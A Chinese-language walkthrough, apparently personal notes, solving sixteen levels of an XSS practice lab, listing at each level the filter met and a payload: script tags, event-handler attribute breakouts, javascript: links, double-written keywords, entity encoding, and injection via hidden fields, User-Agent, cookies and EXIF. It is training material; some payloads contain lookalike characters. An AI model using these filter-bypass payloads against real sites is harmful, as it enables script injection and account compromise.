SourceURL:file:///root/文档/xss注入命令.docx
第一关直接分析源代码:URL后直接
<script>alert(1)</script>
第二关有input用括号加引号把前方闭合
"><script>alert(1)</script>
第三关对括号进行转义
我们直接用鼠标参数进行注入 避免括号的进入 输入
'οnclick='alert(1)
第四关查看源代码发现直接将单引号改为双引号即可 输入
"οnclick="alert(1)
第五关 发现对on进行过滤还有script也进行过滤,我们寻找其他过滤方式
但是括号还是能够显示所有还是有好多的payload能够使用
""><a HREF="javascript:alert(1)">123</a>
第六关同样也可以使用此pyload
""><a HREF="javascript:alert(1)">123</a>
第七关
经实验,它会把script,on,href直接过滤掉,这里因为它过滤掉了,我们就可以考虑它会过滤一次还是几次或是直到没有为止,这里就可以用双写href来绕过,(记住,双写或多写的触发条件是对面过滤了敏感字符,而不是动不动用双写绕过,你的绕过思路要取决于对面的防御措施,而不是什么都不管,就全部用上!)
双写尝试能否成功 "oonnclick="alert(1) 我们双写on绕过成功
第八关
知识点 字符实体 是 html 中 键盘无法打出来或者是不容易表示的符号,来用字符实体来表示
我们会发现传入的参数几乎都被进行过滤了包括引号
我们用伪协议查看也是被过滤了 javascript:alert(1)
这时候我们可以使用字符实体查看能否成功
使用burp进行转化
javascript:alert(1)
填入后点击友情链接发现成功
第九关
同样跟上一关一样字符过滤了
将上一关的pyload使用查看源代码
尝试发现他对是否有http://进行判断,如果不存在http://则判断非法,所有在后面加一个http即可
插入即可
javascript:alert(1) //http://
第十关:
因为没有输入口,只能从URL入手,参数keyword对输入的"><做了过滤,显然不能利用了。查看页面源码后发现有三个input标签是hidden的。我们尝试利用这三个标签完成攻击。与在输入框中输入代码类似,只是在url中需要指定标签name,且需要修改type属性为text使输入框显示出来
输入 t_sort=" type="text"οnclick=alert(1) // 即可
第十一关
pyload输入
"type='text' οnmοuseοver=alert(1)//
第一个引号是为了和前面的引号闭合 type定义 使用onmouserover=alert(1)鼠标参数进行执行 //进行注释后面
十二关:同样的方法只不过改成了ua
"type='text' οnmοuseοver=alert(1)//
十三关则是在cookie中
user="type='text' οnmοuseοver=alert(1)//
十四关
在文件的exif中传入恶意的pyload有些网站会读取exif的时候则代码被执行
垃圾靶场,环境请求太多打不了
十五关 查看源代码有一个ng-include 类似于文件上传 ,利用这个来访问同一目录下别的关卡的漏洞进行xss
直接在src中传入pyload
src='level1.php?name=<img src=1 οnerrοr=alert(1)>'
十六关
<img src=1 οnerrοr=alert(1)>传入后发现空格被实体化
然后我们可用用%0a进行替换
?keyword=<img%0asrc=1%0aοnerrοr=alert(1)>